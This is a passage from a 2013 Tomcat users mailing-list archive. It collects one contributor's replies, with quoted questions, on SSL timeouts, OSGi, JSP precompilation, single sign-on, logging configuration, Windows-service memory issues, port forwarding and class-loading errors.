 filter-classjcifs.http.NtlmHttpFilter/filter-class

 !--
 always needed for preauthentication / SMB signatures
 --
 init-param
 param-namejcifs.smb.client.domain/param-name
 param-valuexxx/param-value
 /init-param
 !-- SMB message signing 

RE: SSL and 408 error code (incomplete request)

[Martin Gainty]

what happens if you increase the connectionTimeout (on your ssl connector) to a 
longer interval  e.g.?
 
$CATALINA_HOME/conf/server.xml  
 
  Connector port=8443 protocol=HTTP/1.1 SSLEnabled=true
connectionTimeout=3



Martin 
__ 
Verzicht und Vertraulichkeitanmerkung

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
 
 Date: Wed, 31 Jul 2013 14:32:39 -0700
 From: solmy...@yahoo.com
 Subject: SSL and 408 error code (incomplete request)
 To: users@tomcat.apache.org
 
 Hi,
 
 
 Has anyone happened to stumble onto this issue, please:
 Our Ajax works perfectly as long as its non-secure.
 However, when switching to SSL we sometimes see 408 errors (incomplete 
 request). This only happens on ajax, and inconsistently (similar requests 
 might succeed on one moment, but fail on the other).
 
 Please note:
 1. Our client is Chrome browser, using JQuery for ajax
 2. Server is Tomcat 7
 3. Network is fast and stable, and the ajax requests are small
 4. Problem occurs for both our connectors: APR and Http (both with SSL 
 enabled) 
 5. Our x509 certificate is valid (otherwise it would have failed on *all* 
 ajax ssl requests, not to mention the non-ajax ssl)
 
 Thanks :)
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: OSGi in Tomcat

[Martin Gainty]

asking your release manager to build an OSGI artifact with eclipse may be a bit 
of a stretch if this is a live production-ready system then you will most 
likely be building at command-line with either ant or maven

the trickiest part is interfacing to BND start and BND stop which can be 
accomplished with Activator sample code seen here
http://wso2.com/library/tutorials/develop-osgi-bundles-using-maven-bundle-plugin
 
lets pick this thread on us...@maven.apache.org

Martin 
__ 
/Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
 Date: Wed, 24 Jul 2013 13:30:01 +0300
 Subject: Re: OSGi in Tomcat
 From: miles...@gmail.com
 To: users@tomcat.apache.org
 
 2013/7/23 Leonardo Torres wrote:
 
  Thank´s for reply.
 
  Just one more question, If I want to use tomcat inside of OSGi
 environment,
  how can I do that ?
 
 
 Check Gemini Web documentation:
 
 http://www.eclipse.org/gemini/web/documentation/
 http://wiki.eclipse.org/Gemini/Web
 
 Regards
 Violeta
  

RE: OT: How to use JSP outside of tomcat

[Martin Gainty]

 
Documentation hasnt caught up with functionality so its catch as catch can but 
this should get you to what you need

pom.xml
 
project
modelVersion4.0.0/modelVersion
groupIdfu/groupId
artifactIdbar/artifactId

plugins
  plugin
  groupIdorg.codehaus.mojo.jspc/groupId
  artifactIdjspc-maven-plugin/artifactId
  configuration
  includeInProjectfalse/includeInProject
  sources

directory${basedir}/myapp/src/main/webapp//directory
 
includes

  include**/*.jsp/include

   /includes

   /sources

   source1.6/source

   target1.6/target

executions
execution
goals
 goalcompile/goal
/goals
/execution
/executions
 /plugin
/plugins
/build
...
/project
 
mvn -e -X compile

http://mojo.codehaus.org/jspc/jspc-compilers/jspc-compiler-tomcat6/index.html
http://mojo.codehaus.org/jspc/jspc-maven-plugin/usage.html

HTH
Martin Gainty 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
 Date: Wed, 24 Jul 2013 13:22:36 -0400
 Subject: OT: How to use JSP outside of tomcat
 From: aryeh.fried...@gmail.com
 To: users@tomcat.apache.org
 
 I have a number of documents that are very template like and ideal for
 JSP that are 1) not intended for the web and 2) need to be
 automatically batch processed (the output stored in output files).
 How do I call the JSP processor from them command line? (it takes
 tomcat too long to see updated files for the purpose I have in mind)
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: SingleSignOn valve enabled by default?

[Martin Gainty]

NO:
 
!-- /conf/server.xml --
!-- SingleSignOn valve, share authentication between web applications  
Documentation at: /docs/config/valve.html --

!--
Valve className=org.apache.catalina.authenticator.SingleSignOn /
--

YES:
 
!-- /conf/server.xml --
!-- SingleSignOn valve, share authentication between web applications  
Documentation at: /docs/config/valve.html --
Valve className=org.apache.catalina.authenticator.SingleSignOn /

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
Date: Fri, 19 Jul 2013 20:16:32 +0800
From: soul2zim...@gmail.com
To: users@tomcat.apache.org
Subject: SingleSignOn valve enabled by default?

 
 
 
Hi all,
 
I have an issue with SSO configuration in tomcat 7.0.42.
 
According to the doc [1],  it requires to enable SSO valve inside
server.xml. However, without making such modification, I deployed two
web-app test.war and test2.war (see attached file). Then, try to login
from /test, after successful login, I don't need to login a second time
for /test2 and can see the secured welcome page directly . That's
strange for me, is the SingleSignOn valve enabled by default in tomcat?
 
FYI, I add following configuration in tomcat-user.xml
role rolename=User/
user username=test password=pass.1234 roles=User/
 
If it's not a real issue, please point me how that works, and I'd like
to know how could I set the reauthenticate parameter for SSO.
 
[1] http://tomcat.apache.org/tomcat-7.0-doc/config/host.html#Single_Sign_On
 
Thanks  Regards,
 
 
 

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org   
  

RE: ClassNotFoundException org.apache.juli.FileHandler in Tomcat 7.0.42 / OpenJDK 6 b27 (FreeBSD)

[Martin Gainty]

Matthias

MGthis is what $CATALINA_HOME/conf/logging.properties is SUPPOSED to look like

# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the License); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
handlers = 1catalina.org.apache.juli.FileHandler, 
2localhost.org.apache.juli.FileHandler, 3manager.org.apache.juli.FileHandler, 
4host-manager.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler
.handlers = 1catalina.org.apache.juli.FileHandler, 
java.util.logging.ConsoleHandler

# Handler specific properties.
# Describes specific configuration info for Handlers.

1catalina.org.apache.juli.FileHandler.level = FINE
1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
1catalina.org.apache.juli.FileHandler.prefix = catalina.
2localhost.org.apache.juli.FileHandler.level = FINE
2localhost.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
2localhost.org.apache.juli.FileHandler.prefix = localhost.
3manager.org.apache.juli.FileHandler.level = FINE
3manager.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
3manager.org.apache.juli.FileHandler.prefix = manager.
4host-manager.org.apache.juli.FileHandler.level = FINE
4host-manager.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
4host-manager.org.apache.juli.FileHandler.prefix = host-manager.
java.util.logging.ConsoleHandler.level = FINE
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter


# Facility specific properties.
# Provides extra control for each logger.

org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 
2localhost.org.apache.juli.FileHandler
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/manager].level 
= INFO
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/manager].handlers
 = 3manager.org.apache.juli.FileHandler
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/host-manager].level
 = INFO
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/host-manager].handlers
 = 4host-manager.org.apache.juli.FileHandler
# For example, set the org.apache.catalina.util.LifecycleBase logger to log
# each component that extends LifecycleBase changing state:
#org.apache.catalina.util.LifecycleBase.level = FINE


 
 Date: Sat, 13 Jul 2013 20:04:15 +0200
 From: matth...@petermann-it.de
 To: users@tomcat.apache.org
 Subject: Re: ClassNotFoundException org.apache.juli.FileHandler in Tomcat 
 7.0.42 / OpenJDK 6 b27 (FreeBSD)
 
 Am 13.07.2013 16:07, schrieb Konstantin Kolinko:
  2013/7/13 Konstantin Kolinko knst.koli...@gmail.com:
  2013/7/13 Matthias Petermann matth...@petermann-it.de:
  Hello,
 
  when I try to start Tomcat 7.0.42 with OpenJDK 6 b27, it complains about 
  not
  finding classes for the logging handlers. I created a minimal
  logging.properties to narrow down the problem:
 
   handlers = 1catalina.org.apache.juli.FileHandler,
  java.util.logging.ConsoleHandler
   .handlers = java.util.logging.ConsoleHandler
 
   1catalina.org.apache.juli.FileHandler.level = FINE
   1catalina.org.apache.juli.FileHandler.directory = 
  ${catalina.base}/logs
   1catalina.org.apache.juli.FileHandler.prefix = catalinatest.
 
   java.util.logging.ConsoleHandler.level = FINE
   java.util.logging.ConsoleHandler.formatter =
  java.util.logging.SimpleFormatter
 
  org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO
  org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers =
  1catalina.org.apache.juli.FileHandler
 
  The output of ./catalina.sh run is the following:
 
   INFO: Starting Servlet Engine: Apache Tomcat/7.0.42
   Can't load log handler 1catalina.org.apache.juli.FileHandler
   java.lang.ClassNotFoundException: 
  1catalina.org.apache.juli.FileHandler
   java.lang.ClassNotFoundException: 
  1catalina.org.apache.juli.FileHandler
   at java.net.URLClassLoader$1.run(URLClassLoader.java:217)
   at java.security.AccessController.doPrivileged(Native Method)

RE: Memory limits for children processes when running Tomcat as service?

[Martin Gainty]

When you run your MS app standalone how much heap, stack does this process 
occupy?
When TC startsup how much heap,stack is left over for the standalone Microsoft 
app?

If youre not going to powerup your machine with 8GB RAM and at least tera of 
storage your only solution
is to configure your Microsoft Compound Documents be opened, read and written 
using POI
https://poi.apache.org/

Keep us apprised,
Martin
 
 From: j.tosov...@email.cz
 To: users@tomcat.apache.org
 Subject: RE: Memory limits for children processes when running Tomcat as 
 service?
 Date: Thu, 27 Jun 2013 21:24:03 +0200
 
 On 2013-06-27 André Warnier wrote:
  honyk wrote:
   On 2013-06-26 André Warnier wrote:
   honyk wrote:
   Dear All,
  
   I have a JSF2.0 app that executes (via ProcessBuilder) an external
   script.
   This script opens PPTX via PowerPoint ActiveX object, manipulate it
   and
   save. It runs on Windows Server 2008 R2 64-bit, 4GB RAM, JDK 7.
  
   When tomcat 7 is launched using startup.bat (with original
  settings),
   it
   works fine.
  
   When tomcat runs as a service, opening the PPTX in the PowerPoint
   fails
   because of Out Of Memory error regardless Xmx settings
   (tomcat7w.exe).
   I originally asked PowerPoint forum, but haven't get any
  explanation
   yet:
   http://answers.microsoft.com/thread/37cbebf6-4003-4ab0-9295-
   92413aaecc2e
   But as the entry point is Tomcat and the only difference between
   problematic
   and non problematic behavior is the 'service' mode, maybe there is
   something
   related in the tomcat7.exe code base. Just guessing.
  
   Has anybody an idea why both modes behave differently?
  
   Hi.
   The problem has nothing to do with Tomcat per se.
   It is due to running a Microsoft Office program (or library modules
   such as the Interop
   series) as a sub-process of a Windows Service (and thus in the same
   Service context) which
   is something that is not in the design of Microsoft Office, not
   supported by Microsoft,
   and even actively discouraged by Microsoft.
   See : http://support.microsoft.com/kb/257757
  
   The problem is basically that a Windows Service does not run in the
   same environment as
   a user session environment, and as they say in that article, you
  will
   certainly
   experience unstable behavior and/or deadlock somewhere, and will
  get
   no help for it.
  
   I read this article but because I do not need intraction and my code
  doesn't
   run simultaneously and tomcat is launched using my credentials - I
  still
   thought it could be possible.
  
   Now realizing that tomcat launched using my credentials do not
  necesarily
   mean that Office use the same...
  
   Personal experience : some things will work with one MS-Office
  program,
   and totally fail
   with another; even simple things like opening or saving a file.  It
  may
   work with one
   file, and fail with another, for no apparent reason.
   You get an OOM error in this case, but other cases may be file not
   found (although it's
   there) or whatever other bizarre failures.
   Ultimately it is unpredictable, frustrating and time-consuming.
  
   I was an optimist when everything worked in the user mode...
  
   Solutions :
   1) instead of MS-Office, use LibreOffice or OpenOffice.  Both can
  run
   in headless mode,
   and provide an API to have them do things with documents. And both
   can open and
   manipulate MS-Office documents.  Depending on what you do, there may
  be
   some differences
   in the results, but it works fine for many things.
   Or try one of the other solutions suggested in the above article.
   (I have not tried them, I use OpenOffice/LibreOffice).
  
   I'll give it a try. I originaly tested Apache POI, but required
   functionality is not implemented yet.
  
   2) do not run Tomcat as a Service. Create a virtual Windows machine,
   and run it in a user
   console (with startup.bat). You can restrict access to the VM, and
   since it is a VM, it
   can run unattended, just as a service would.
   (I am also using this scheme, when circumstances permit).
   But in that case, also pay attention to the licensing considerations
  at
   the end of the
   article.
  
   I am quite lost in this ;-) But I'll investigate further.
  
   Thanks a lot for your exhaustive analysis! Finally it looks my way is
  no way
   :-)
  
  
  No problem. I went myself through the exact same issues as you
  described, I did believe
  that there must be a workaround, tried a number of things with great
  loss of time, and
  finally had to admit that the MS article was right and that there is no
  good solution with
  MS-Office when starting it from a Service.
 
 I appreciate a lot your response and sharing your experience. Without it I
 would spend many additional hours of investigating, trial and error
 attempts, asking the same topic in different places, all this in heavy
 frustration... 
 
  About the Virtual Machine solution : usually, when you want something

RE: forward request by changing the port in request url

[Martin Gainty]

for IP Redirecting and or automatic Network Address Translations (e.g. Port 80 
redirects to Port 81)

you will need a proxy server 

please contact supp...@cisco.com


for product and service options

 

Viel Gluck
Martin 

__ 
Verzicht und Vertraulichkeitanmerkung

 

 Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.


  


 From: anigo...@cisco.com
 To: users@tomcat.apache.org
 Subject: forward request by changing the port in request url
 Date: Thu, 13 Jun 2013 18:00:12 +
 
 i have two service running under tomcat. One service is default i.e. catalina 
 on port 8080 and 8443
 second service is catalina_new on port 8081 and 8444.
 
 i have application abc.war deployed in webapps_new service which is running 
 on port 8081. This application is not there in webapps.
 i want if any request coming on port 8080 for application abc, it is 
 forwarded to port 8081.(same for ssl port 8443-8444)
 Is there any way to do the same.
 
 Thanks
 Anil
  

RE: Class cast exception when starting tomcat 7.0.1

[Martin Gainty]

you can swap out one jar for another

Ant has no idea which container it is communicating with unless you tell it

catalina.jar is tied to the Servlet Spec so 
you cannot change catalina unless you change the accompanying Servlet Spec

so you've already done that why not write a Quick and Dirty ant taskdef

I'll pick this up on us...@ant.apache.org

 

Viel Gluck

Martin Gainty 
__ 
Jogi és Bizalmassági kinyilatkoztatás/Verzicht und 
Vertraulichkeitanmerkung/Note de déni et de confidentialité


 
Ez az üzenet bizalmas.  Ha nem ön az akinek szánva volt, akkor kérjük, hogy 
jelentse azt nekünk vissza. Semmiféle továbbítása vagy másolatának készítése 
nem megengedett.  Ez az üzenet csak ismeret cserét szolgál és semmiféle jogi 
alkalmazhatósága sincs.  Mivel az electronikus üzenetek könnyen 
megváltoztathatóak, ezért minket semmi felelöség nem terhelhet ezen üzenet 
tartalma miatt.

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  


 From: jm...@rocketsoftware.com
 To: users@tomcat.apache.org
 Subject: RE: Class cast exception when starting tomcat 7.0.1
 Date: Thu, 13 Jun 2013 20:19:07 +
 
 I had catalina.jar in WEB-INF/lib. It's needed because we have an 
 implementation of Realm to store an encrypted tomcat password users enter in 
 the webapp. If I remove it and add the catalina.jar from tomcat_home/lib to 
 the classpath, I have to change the signature from 
 org.apache.catalina.realm.RealmBase.Digest(String, String) to 
 org.apache.catalina.realm.RealmBase.Digest(String, String, String). Then the 
 code compiles ok, but I get this error when building with ant to make a war 
 file:
 
 error: method Digest in class RealmBase cannot be applied to given types;
 [javac] encryptedOldPwd = RealmBase.Digest(oldTomcatPassword, digestAlg,null);
 
 Should I not be writing code that needs classes from catalina.jar?
 
 Thanks,
 
 Jane
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net] 
 Sent: Thursday, June 13, 2013 11:09 AM
 To: Tomcat Users List
 Subject: Re: Class cast exception when starting tomcat 7.0.1
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256
 
 Jane,
 
 On 6/13/13 12:38 PM, Jane Muse wrote:
  In the archives I thought the only unreleased versions would be 
  specified beta. Please let me know if this is not the case.
 
 I'll admit it's not clear from the version number which versions are beta, 
 released, etc. You have to look at the ChangeLog:
 
 http://tomcat.apache.org/tomcat-7.0-doc/changelog.html
 
 Each release contains a release date and (optionally) a comment on the 
 quality of the build. The first non-beta version of Tomcat 7.0.x was 7.0.6. 
 Tomcat 7.0.1 (distinct from 7.0.10) was actually not released
 probably because it was broken for some reason.
 
 When the Tomcat team rolls a release, there is a vote. If there aren't enough 
 yes votes (or any no votes), the release is abandoned but the number 
 isn't re-used.
 
 Anyhow, there's no reason to attempt to migrate from Tomcat 6.0.x to Tomcat 
 7.0.x by shooting for an early version of Tomcat 7.0.x: you should go for 
 the latest.
 
 Also, if you mistype and say Tomcat 7.0.1 instead of Tomcat 7.0.10
 or Tomcat 7.0.4 instead of Tomcat 7.0.40 (or Tomcat 7.0.41), don't get 
 an offended when people tell you you are doing it wrong.
 Just say whoops, I meant 7.0.40 and move on.
 
 Back to your original problem... have you modified the Tomcat 7 installation 
 in any way -- other than dropping your WAR file/exploded WAR into the 
 webapps/ directory)?
 
 Also, do you have any Tomcat-related JAR files in your webapp's WEB-INF/lib 
 directory?
 
 - -chris
 -BEGIN PGP SIGNATURE-
 Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
 Comment: GPGTools - http://gpgtools.org
 Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
 iQIcBAEBCAAGBQJRugqsAAoJEBzwKT+lPKRYkwcQALdDoGGk6ZNHg82Ow8vTjjrY
 dO/70UaIg69t4TsgIJApzd+ReSMbzrThby4Ok+EkYOEXLC1tZgbbQpTQdx0sjqXc
 k7fJl9oRQ/O9UP4lj+PR1iWL0zTX/Ze+eTQLIHiJ6rpNnyqgSOnZujsev1lbbaUZ
 A2w8GwiWOPvA17MIQUio1Rr/OKd6s7/02EKJQwbxIRoBh4jdaTalgJXCBKb5+60p

RE: Customizing SSL in HttpClient

[Martin Gainty]

Anil
 
if you want JSSE Handshaking to be enabled on server enable AprLifecycle 
Listener on server.xml e.g.
  Listener className=org.apache.catalina.core.AprLifecycleListener 
SSLEngine=on /

Any WebServer (including Tomcat) has no knowledge of external HTML Servers 
around it you should use netstat
netstat -ab | grep 443

Tell us what you see
Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
 From: anigo...@cisco.com
 To: users@tomcat.apache.org
 Subject: RE: Customizing SSL in HttpClient
 Date: Tue, 11 Jun 2013 06:29:05 +
 
 
 
 -Original Message-
 From: Anil Goyal -X (anigoyal - Aricent Technologies at Cisco) 
 Sent: Tuesday, June 11, 2013 11:23 AM
 To: Tomcat Users List
 Subject: RE: Customizing SSL in HttpClient
 
 
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net]
 Sent: Monday, June 10, 2013 7:51 PM
 To: Tomcat Users List
 Subject: Re: Customizing SSL in HttpClient
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256
 
 Anil,
 
 On 6/10/13 8:42 AM, Anil Goyal -X (anigoyal - Aricent Technologies at
 Cisco) wrote:
  I am trying to create a http client and send a request to certain port 
  of a server using below code:
  
  HttpClient client = new HttpClient(); 
  client.getHostConfiguration().setHost(address, portNumber, protocol);
  
  Here portNumber that I am setting is 8444(https port of tomcat)
  
  When I execute client.executemethod() and at the server side when I 
  tried to retrieve request.getRequestURL(), I am getting the url with 
  port 443 not 8444 which I set in client. Even request.getServerPort is 
  giving 443 not 8444.
 
 Is there any kind of port-forwarding or anything else going on?
 
  The things are working fine for 8081(http port of tomcat) i..e 
  HttpClient client = new HttpClient(); 
  client.getHostConfiguration().setHost(address, portNumber, protocol);
  
  Here portNumber that I am setting is 8081(https port of tomcat)
  
  When I execute client.executemethod() and at the server side when I 
  tried to retrieve request.getRequestURL(), I am getting the url with 
  port 8081 which I set in client. Even request.getServerPort is giving 
  8081.
 
 Can you show us a bit more of the code? It's not clear from you client code 
 that the port number is set correctly, and you only mentioned the server. Can 
 you give us some of that, too? Also, what do your Connector elements look 
 like in server.xml?
 
 - -chris
 -BEGIN PGP SIGNATURE-
 Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
 Comment: GPGTools - http://gpgtools.org
 Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
 iQIcBAEBCAAGBQJRteC5AAoJEBzwKT+lPKRY8TUP/3QuIqKPxB5HjVaUywkPmIQt
 +LoZLdHhOLdrkwE2ojW1qk0YnX2wpgr6W3W6uBk5l5yrrdcHAFcOWcNIi9fjl8bo
 xW8uZi+vGkyv1Pdii5JJrfDjbxdtbsTpHBn7yoKMUzJ9V9xmHwqNsi89xi/mZLty
 hj6LNMvftgpQQdPmoPoLJr4ZfmQj2DAI+wX0u/fNgk8cf5wdHJZZu03COPIeRbam
 Gn+fOjfK0YL93ntmLP2PbGtlCprBaqPcZRh+AiKFhg4W7+qGVDXGa2SIvrcWbgdU
 qHRKxyJ+5j3o0Y74Q0wKRcSEUXbidEhDAtJCQgNOJJi+S4SYgl2OLOXhkxMABBkS
 xYIXsAPu4SoVcuiCpGvb2LhD5uqMOyH0NxCpv/TVFsEzOy2EZHLrts1DYNAyIo7M
 zqZv2efOTPwcaHRZxgzUB2s23uzs3aiXiKOzYHB7AALJnASCx4fNeOgZwMxdK6o0
 qs09m0EKL29QurG3iKXHCA0dOeZzxV4ZUduFZtR2eLIsayqoKpL6fh+asLZFW40y
 ZMOvPzlpXwdRX36IdzwTlwrvMOmynfgGfL/yAdCfqN0hlA0OVo7PYNryxSfZhX+2
 O1//zDFNSxs2BS9ErQkNyKP8xfVk76XbYUybsbNtivnxjv1a8N72h3qeuixA/ZUJ
 gJEvsTX0kD+rb8xYmIlJ
 =Qqhu
 -END PGP SIGNATURE-
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 Please consider the code flow as below:
 
 HttpClient client = new HttpClient();
 portNumber = secure ? LocalNetworkConstants.DEFAULT_HTTPS_PORT : 
 LocalNetworkConstants.DEFAULT_HTTP_PORT; // DEFAULT_HTTPS_PORT=8444 and 
 DEFAULT_HTTP_PORT=8081 define in  LocalNetworkConstants.java  LOG.debug(the 
 value of https port is+String.valueOf(portNumber)); if (secure) {
 Protocol 

RE: Illegal access: this web application instance has been stopped already and NoClassDefFoundError

[Martin Gainty]

I

   org.apache.zookeeper.ClientCnxn$SendThread.run(ClientCnxn.java:1115)
  
   
  Caused by: java.lang.ClassNotFoundException:
  org.apache.zookeeper.server.ZooTrace
MGput zookeeper*.jar on CLASSPATH

   at
   org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1711)
  
   
  at
  org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1556)
   ... 1 more
   
   
   
   
   at the same time,the following is also in catalina.out:
   
   
   
   INFO: Illegal access: this web application instance has been
   stopped already. Could not load
   org.apache.zookeeper.server.ZooTrace. The eventual following stack
   trace is caused by an error thrown for debugging purposes as well
   as to attempt to terminate the thread which caused the illegal
   access, and has no functional impact. 
   java.lang.IllegalStateException at
   org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1597)
  
   
  at
  org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1556)
   at
   org.apache.zookeeper.ClientCnxn$SendThread.run(ClientCnxn.java:1115)
  
   
   
   
   I searched google and mail list ,couldn't find any solution,please
   help me.
   
   
   Enviroment info:
   
   JDK:1.6.0_45
   
   Tomcat:7.0.40
   
   Zookeeper:3.4.5
  
  Can you give us any more of the stack trace? It looks like this is
  happening during shutdown, but all the ServletContextListeners should
  complete before the WebappClassLoader starts shedding its loaded classes.
  
  Are you explicitly shutting-down the ClientCnxn thread in a SCL's
  destroy() method? If not, you need to do that.
  
 
 Sorry,I can't get any more of the stack trace.
  
 We wrapped zookeepr client as a spring bean and invoked  method close of 
 zookeeper  in  destory-method of bean,in that method close,zookeeper Send 
 Thread was closed.
 When tomcat was shut down, Spring closed it's container and bean was 
 detroyed, then destroy-method of bean was invoked.
 I'am confusing why is Send Thread of Zookeeper  seemed to exit slower than  
 the WebappClassLoader shedding its loaded classes. 
  
 ps: details of zookeeper closing
 org.apache.zookeeper.Zookeeper
  public synchronized void close() throws InterruptedException {
 if (!cnxn.getState().isAlive()) {
 if (LOG.isDebugEnabled()) {
 LOG.debug(Close called on already closed client);
 }
 return;
 }
 if (LOG.isDebugEnabled()) {
 LOG.debug(Closing session: 0x + 
 Long.toHexString(getSessionId()));
 }
 try {
 cnxn.close();
 } catch (IOException e) {
 if (LOG.isDebugEnabled()) {
 LOG.debug(Ignoring unexpected exception during close, e);
 }
 }
